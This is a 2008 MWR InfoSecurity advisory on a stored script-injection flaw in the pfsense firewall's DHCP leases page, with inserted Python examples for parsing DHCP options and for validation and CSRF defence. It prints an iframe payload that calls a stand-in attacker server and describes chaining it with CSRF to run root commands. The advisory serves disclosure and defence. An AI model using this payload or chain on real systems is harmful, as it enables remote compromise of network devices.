MWR InfoSecurity Security Advisory. pfsense DHCP Script Injection Vulnerability. 25th July 2008.




Contents
1 Detailed Vulnerability Description ... 5
1.1 Technical Background ... 5
1.2 Overview of Vulnerability ... 5
1.3 Exploit Information ... 7
2 Recommendations ... 9
3 References ... 9
4 Acknowledgement ... 9

pfsense Firewall DHCP Script Injection Vulnerability

Package Name: pfsense Open Source Firewall
Date Discovered: January 2008
Affected Versions: Confirmed in Version 1.0.1
CVE Reference: Not Yet Assigned
Author: Rafael Dominguez Vega
Severity: High Risk
Local/Remote: Remote
Vulnerability Class: Script Injection / Remote Code Execution
Vendor: pfsense http://www.pfsense.com/
Vendor Response: A fix was implemented that resolves this issue. pfsense users updating to version 1.2 will not be affected. It should be noted that the 1.0.x release is a deprecated version and therefore no longer recommended for use. Updates can be found in the following location: http://www.pfsense.org/index.php?option=com_content&task=view&id=58&itemid=46
Exploit Details Included: Yes
Application Language: PHP

Overview:
pfsense is a free, open source customized distribution of FreeBSD tailored for use as a firewall and router (http://www.pfsense.org/). The pfsense firewall and router is intended to provide users with various functionality, such as VPN connectivity, load balancing, real time information, DHCP server, etc. (http://www.pfsense.org/index.php?option=com_content&task=view&id=40&itemid=43)

The pfsense firewall provides users with a DHCP server and the ability to manage it via an administrative web interface. This allows users to set up configuration options and view active DHCP leases.

It should be noted that after this issue was identified, it was found that the vendor released an advisory in February 2008 titled "pfsense Unspecified Cross-Site Scripting Vulnerabilities" (http://www.securityfocus.com/bid/28072/info). The vulnerability discussed in the vendor advisory relates to an input validation issue; however, insufficient details were provided to confirm whether the vulnerability discussed in this advisory is the same issue.

The reason for disclosing this advisory is to supplement the research outlined in the white paper titled "Behind Enemy Lines": http://www.mwrinfosecurity.com/publications/mwri_behind-enemy-lines_2008-07-25.pdf

Impact:
The pfsense firewall administrative web interface has been identified as being vulnerable to a script injection attack that could allow remote attackers to execute commands on the target system with root privileges. An attacker must be in a position to obtain a DHCP lease from the target device.

Cause:
Exploitation of this vulnerability is possible because the pfsense firewall web interface does not properly sanitise parameters that are passed to it from the DHCP server. If a specially crafted DHCPREQUEST message containing malicious code in the Hostname DHCP Options field is sent to pfsense's DHCP server, this will be displayed in the DHCP active leases page of the pfsense administrative interface and will be executed when an administrator visits this page.

Interim Workaround:
Remove the DHCP active leases page from the pfsense administrative interface and manage the DHCP server via the shell console.

Solution:
A fix was implemented that resolves this issue. It is recommended that users update to version 1.2.

1 Detailed Vulnerability Description

1.1 Technical Background
DHCP (Dynamic Host Configuration Protocol) is a protocol that runs at the application layer (TCP/IP and OSI reference models) and which is used to assign dynamic IP addresses to devices on a network (http://www.ietf.org/rfc/rfc2131.txt). DHCP also enables the exchange of a series of TCP/IP configuration parameters (such as the subnet mask, default router, device host name, etc.) between the DHCP server and the network device.

In order to obtain a dynamic IP address, the network device must first send a DHCPDISCOVER message in order to find the DHCP server on the network. The server will respond by sending a DHCPOFFER message containing the IP address that the server is offering (referred to as the IP lease offer). The network device then broadcasts a DHCPREQUEST message in response to the IP lease offer received from the DHCP server. The DHCP options field of this message contains the Hostname of the network device. When the DHCP server receives the DHCPREQUEST from the network device, it responds with a DHCPACK message assigning the IP address to the network device and adding it to the list of active leases.

1.2 Overview of Vulnerability
The pfsense web interface obtains information about the active leases from the DHCP server. An attacker connected to the same network on which the pfsense device is located could send a specially crafted DHCPREQUEST message containing a malicious payload in the DHCP Options Hostname field. This would then be passed from the DHCP server to the web interface and executed when the DHCP active leases page was visited by an administrator. The pfsense web interface runs with root privileges and the malicious code would be executed with these privileges.

A screenshot of a JavaScript alert box being rendered on the DHCP leases page after a malicious DHCPREQUEST message was sent is included here:

Figure 1: JavaScript rendered in the DHCP leases page.

An example DHCPREQUEST message containing a malicious payload in the DHCP Options Hostname field is shown in the Wireshark capture below:

Figure 2: DHCPREQUEST Hostname field malicious payload.
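To make the message layout behind Figure 2 concrete, the following is an added example (not code from the advisory, from MWR or from the pfsense project) in Python. It parses the options field of a DHCP message as laid out in RFC 2131/2132 (fixed 236-byte header, magic cookie, then type-length-value options), reports the DHCP message type (option 53) and the Host Name option (option 12), and flags a hostname that carries HTML markup, which is the condition a defender would look for when reviewing captures of lease traffic. The DHCPREQUEST it parses is constructed inline for the example, and the hostname in it is a constructed sample value rather than the advisory's payload.

```python
"""Parse DHCP options and extract the Host Name option that the pfsense
leases page displayed unsanitised. Added example; not advisory or pfsense code."""
import struct

MAGIC_COOKIE = b"\x63\x82\x53\x63"  # RFC 2132 magic cookie that starts the options field
HEADER_LEN = 236                     # fixed-length header preceding the options (RFC 2131 section 2)

MESSAGE_TYPES = {1: "DHCPDISCOVER", 2: "DHCPOFFER", 3: "DHCPREQUEST", 4: "DHCPDECLINE",
                 5: "DHCPACK", 6: "DHCPNAK", 7: "DHCPRELEASE", 8: "DHCPINFORM"}


def parse_options(packet: bytes) -> dict:
    """Return {option_code: raw_bytes} for the TLV options that follow the magic cookie."""
    if len(packet) < HEADER_LEN + 4 or packet[HEADER_LEN:HEADER_LEN + 4] != MAGIC_COOKIE:
        raise ValueError("not a DHCP message (missing magic cookie)")
    options = {}
    i = HEADER_LEN + 4
    while i < len(packet):
        code = packet[i]
        if code == 0:            # PAD option: a single byte with no length field
            i += 1
            continue
        if code == 255:          # END option: nothing meaningful follows
            break
        if i + 1 >= len(packet):
            raise ValueError("truncated option header")
        length = packet[i + 1]
        data = packet[i + 2:i + 2 + length]
        if len(data) != length:  # length byte claims more data than the packet holds
            raise ValueError("option %d runs past end of packet" % code)
        options[code] = data
        i += 2 + length
    return options


def summarise(packet: bytes) -> dict:
    """Message type, hostname, and whether the hostname contains HTML-significant characters."""
    opts = parse_options(packet)
    mtype = opts.get(53, b"\x00")[0]
    hostname = opts.get(12, b"").decode("ascii", errors="replace")
    return {"message_type": MESSAGE_TYPES.get(mtype, "UNKNOWN"),
            "hostname": hostname,
            "hostname_has_markup": any(c in hostname for c in "<>\"'&")}


def build_sample_request(hostname: bytes) -> bytes:
    """Constructed DHCPREQUEST for the example: minimal header, then three options."""
    header = struct.pack("!BBBBIHH4s4s4s4s16s64s128s",
                         1, 1, 6, 0,            # op=BOOTREQUEST, htype=Ethernet, hlen=6, hops=0
                         0x3903F326, 0, 0x8000,  # xid (constructed), secs, flags (broadcast)
                         b"\0" * 4, b"\0" * 4, b"\0" * 4, b"\0" * 4,   # ciaddr/yiaddr/siaddr/giaddr
                         b"\x00\x11\x22\x33\x44\x55" + b"\0" * 10,      # chaddr (constructed MAC)
                         b"\0" * 64, b"\0" * 128)                       # sname, file
    options = (MAGIC_COOKIE
               + bytes([53, 1, 3])                         # DHCP Message Type = DHCPREQUEST
               + bytes([50, 4]) + bytes([192, 168, 1, 50])  # Requested IP Address
               + bytes([12, len(hostname)]) + hostname     # Host Name (option 12)
               + bytes([255]))                             # END
    return header + options


if __name__ == "__main__":
    # A hostname carrying markup, as the leases page would have received it.
    print(summarise(build_sample_request(b"pc1<b>bold</b>")))
```

The parser stops at the END option and tolerates PAD bytes, so it behaves correctly on real captures as well as on the constructed packet; the `hostname_has_markup` flag is the simple signal a lease-monitoring script would raise.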

1.3 Exploit Information
It was possible to construct a proof of concept attack which could be used to execute arbitrary code remotely. This could, in turn, be used as the basis of an attack which gained access to a pfsense device with root privileges. One simple example of how to fully compromise a device using this attack is outlined below.

An attacker would send a specially crafted DHCPREQUEST message to a pfsense DHCP server. The DHCP message would contain a malicious payload in the DHCP Options Hostname field of the message. The injected code could be of the following form:

<iframe height=0 width=0 src='http://attacker-web-server/'>

This payload is known to be executed in the Mozilla Firefox web browser and will cause the user's browser to connect to the attacker's web server. This code would execute in the DHCP leases page and reference a malicious script located on a host under the attacker's control.

Figure 3: Delivery of malicious script to Hostname field.

The attacker's web server could then make a POST request to the command execution functionality provided by the pfsense web interface (http://xxxxxx/exec.php) and execute the desired command using a Cross Site Request Forgery technique (http://www.owasp.org/index.php/top_10_2007-a5).

Figure 4: pfsense administrative interface command execution page.

In this trivial example this would result in the whoami command being executed on the system. However, an attacker could alter this code to execute commands of their choosing, which could result in the remote compromise of the target system.

2 Recommendations
A fix was implemented that resolves this issue. It is recommended that users update to version 1.2.

It is recommended that any application vulnerable to DHCP script injection attacks is redesigned such that all user input is subject to strict input validation. All input variables must be checked against specific data types, with all unauthorised input being rejected.

An additional layer of protection should also be added by HTML encoding all data that is returned to the user. This would form part of a layered security model that provides greater defence against attacks that bypass input validation.

Additionally, as an extra layer of security, the application code should be modified to prevent CSRF attacks. The most effective method for achieving this is to use a one-time dynamic transaction ID for all requests sent to the server.

3 References
pfsense Open Source Firewall: http://www.pfsense.org/
pfsense Features page: http://www.pfsense.org/index.php?option=com_content&task=view&id=40&itemid=43
RFC 2131 - Dynamic Host Configuration Protocol: http://www.ietf.org/rfc/rfc2131.txt
OWASP Top 10 2007 - Cross Site Request Forgery: http://www.owasp.org/index.php/top_10_2007-a5
usefulfor.com/ruby - Net::DHCP: http://usefulfor.com/ruby/2007/11/05/netdhcp/
Scapy: http://www.secdev.org/projects/scapy/
Whitepaper: Behind Enemy Lines: http://www.mwrinfosecurity.com/publications/mwri_behind-enemy-lines_2008-07-25.pdf

4 Acknowledgement
MWR InfoSecurity would like to acknowledge pfsense for their co-operation in working with the author in regards to this matter and their pro-active approach to resolving the issue discussed here.
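The three layers the Recommendations section calls for (strict input validation against a specific data type, HTML encoding of everything returned to the user, and a one-time transaction ID that defeats the CSRF step of the attack chain) are shown together in the following added example. It is written in Python rather than pfsense's PHP, and it is not code from the advisory or from the pfsense project; the function and class names, the lease-row layout, and the form field name `csrf_token` are assumptions made for the example. The hostname type is RFC 1123 hostname syntax, which is what a DHCP Host Name option is supposed to carry.

```python
"""Layered defence for a leases page: validate, encode, and gate state changes
with one-time tokens. Added example; not advisory or pfsense code."""
import hmac
import html
import re
import secrets

# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens,
# each 1-63 characters, not starting or ending with a hyphen, 253 characters total.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOSTNAME_RE = re.compile(r"^(?:%s)(?:\.%s)*$" % (_LABEL, _LABEL))


def is_valid_hostname(name: str) -> bool:
    """Layer 1: whitelist validation against the hostname data type; anything else is rejected."""
    return isinstance(name, str) and len(name) <= 253 and HOSTNAME_RE.match(name) is not None


def render_lease_row(ip: str, mac: str, hostname: str) -> str:
    """Layer 2: build one HTML table row for the leases page.
    A hostname failing validation is replaced by a fixed marker, and every value is
    HTML-encoded regardless, so a bypass of layer 1 still cannot inject markup."""
    shown = hostname if is_valid_hostname(hostname) else "(invalid hostname)"
    return "<tr><td>%s</td><td>%s</td><td>%s</td></tr>" % (
        html.escape(ip, quote=True),
        html.escape(mac, quote=True),
        html.escape(shown, quote=True),
    )


class CsrfTokens:
    """Layer 3: one-time dynamic transaction IDs, issued per form render and
    consumed on first use, so a forged cross-site POST has no valid token to present."""

    def __init__(self):
        self._issued = set()

    def issue(self) -> str:
        token = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG
        self._issued.add(token)
        return token

    def consume(self, presented: str) -> bool:
        if not isinstance(presented, str):
            return False
        for token in list(self._issued):
            # constant-time comparison; the token is removed so it cannot be replayed
            if hmac.compare_digest(token.encode(), presented.encode()):
                self._issued.discard(token)
                return True
        return False


def authorise_exec(tokens: CsrfTokens, form: dict) -> bool:
    """Gate for a state-changing POST such as a command execution page:
    the request proceeds only if it carries a valid, unused token."""
    return tokens.consume(form.get("csrf_token", ""))


if __name__ == "__main__":
    # Constructed lease entries, one of them carrying markup in the hostname.
    print(render_lease_row("192.168.1.50", "00:11:22:33:44:55", "pc1<iframe>"))
    print(render_lease_row("192.168.1.51", "00:11:22:33:44:56", "laptop-01"))
    tokens = CsrfTokens()
    tok = tokens.issue()
    print(authorise_exec(tokens, {"csrf_token": tok}), authorise_exec(tokens, {"csrf_token": tok}))
```

Validation and encoding are deliberately independent: the row renderer never trusts that validation ran upstream, which is the point of the layered model the advisory describes. Tokens are single-use, so the same token presented twice is refused the second time.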

MWR InfoSecurity
St. Clement House
1-3 Alencon Link
Basingstoke, RG21 7SB
Tel: +44 (0)1256 300920
Fax: +44 (0)1256 844083
mwrinfosecurity.com